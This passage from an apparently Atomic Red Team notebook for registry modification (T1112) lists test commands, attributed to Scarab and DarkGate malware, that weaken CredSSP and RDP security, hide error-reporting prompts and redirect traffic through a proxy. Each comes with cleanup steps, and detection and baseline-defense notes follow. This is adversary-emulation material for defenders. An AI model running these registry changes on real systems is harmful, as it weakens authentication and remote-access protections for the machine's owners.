[Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 62

#### Cleanup: 
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 62 -Cleanup

### Atomic Test #63 - Disable Remote Desktop Anti-Alias Setting Through RegistryA modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 63

#### Cleanup: 
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 63 -Cleanup

### Atomic Test #64 - Disable Remote Desktop Security Settings Through RegistryA modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 64

#### Cleanup: 
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 64 -Cleanup

### Atomic Test #65 - Disabling ShowUI Settings of Windows Error Reporting (WER)A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. 
This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 65

#### Cleanup: 
```cmd
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 65 -Cleanup

### Atomic Test #66 - Enable Proxy SettingsA modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 66

#### Cleanup: 
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 66 -Cleanup

### Atomic Test #67 - Set-Up Proxy ServerA modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 67

#### Cleanup: 
```cmd
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 67 -Cleanup

### Atomic Test #68 - RDP Authentication Level OverrideA modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 68

#### Cleanup: 
```cmd
reg delete "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 68 -Cleanup

## Detection
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.

Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).


## Shield Active Defense
### Baseline 
 Identify key system elements to establish a baseline and be prepared to reset a system to that baseline when necessary. 

 Identify elements of software and configuration critical to a set of objectives, define their proper values, and be prepared to reset a running system to its intended state.  
#### Opportunity
There is an opportunity to utilize known good copies of registry information and restore it if an adversary makes any changes.
#### Use Case
A defender can enable Registry Auditing on specific keys to produce an alerts whenever a value is changed and revert those keys to baseline.
#### Procedures
Maintain a verified baseline firewall configuration and use that copy as a fallback if an adversary alters that information.
Maintain a verified list of group policies enforced on a system and use that copy if an adversary attempts to deviate from the baseline.
